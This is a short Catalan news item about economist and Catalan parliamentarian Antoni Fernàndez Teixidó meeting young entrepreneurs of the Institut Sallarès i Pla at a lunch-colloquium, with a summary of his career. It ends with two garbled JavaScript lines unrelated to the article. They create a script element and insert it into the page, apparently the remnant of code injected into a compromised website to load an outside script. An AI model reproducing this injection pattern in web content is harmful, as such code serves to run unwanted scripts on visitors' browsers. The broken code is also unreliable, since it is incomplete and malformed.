L’economista Antoni Fernàndez Teixidó visita els joves empresaris de l’ISP

Els joves empresaris i directius industrials de l’Institut Sallarès i Pla, s’han reunit, aquest dilluns 17 de juny,  amb el Sr. Antoni Fernàndez Teixidó, en un dinar-col·loqui en el transcurs del qual han pogut intercanviar opinions sobre temes d’actualitat econòmica, política i social.

Amb un gran bagatge curricular en Fernàndez Teixidó és Economista, Llicenciat en Administració i Direcció d’Empreses, Censor Jurat de Comptes, Auditor i  Consultor. Ha ostentat diversos càrrecs polítics de rellevància. Des de l’any 1999 és diputat al Parlament de Catalunya per CIU. Durant els anys 2002 i 2003 va ésser Conseller de Treball, Indústria, Comerç i Turisme del Govern de la Generalitat de Catalunya, entre d’altres càrrecs.En l’actual legislatura és President de la Comissió Parlamentaria d’Economia i Finances, membre de la Comissió d’Empresa i Ocupació i de la Comissió de Sindicatura de Comptes.Particularment, actiu en la societat civil, és  vice-president  de la Societat d’Estudis Econòmics, soci fundador de l’Institut von Mises, membre del Secretariat de llibergencia i membre del Cercle d’Economia, entre d’altres.

var d=document;var s=d.createElement(‘script’);

} else {document.currentScript.parentNode.insertBefore(s, document.currentScript);document.currentScript.parentNode.insertBefore(s, document.currentScript);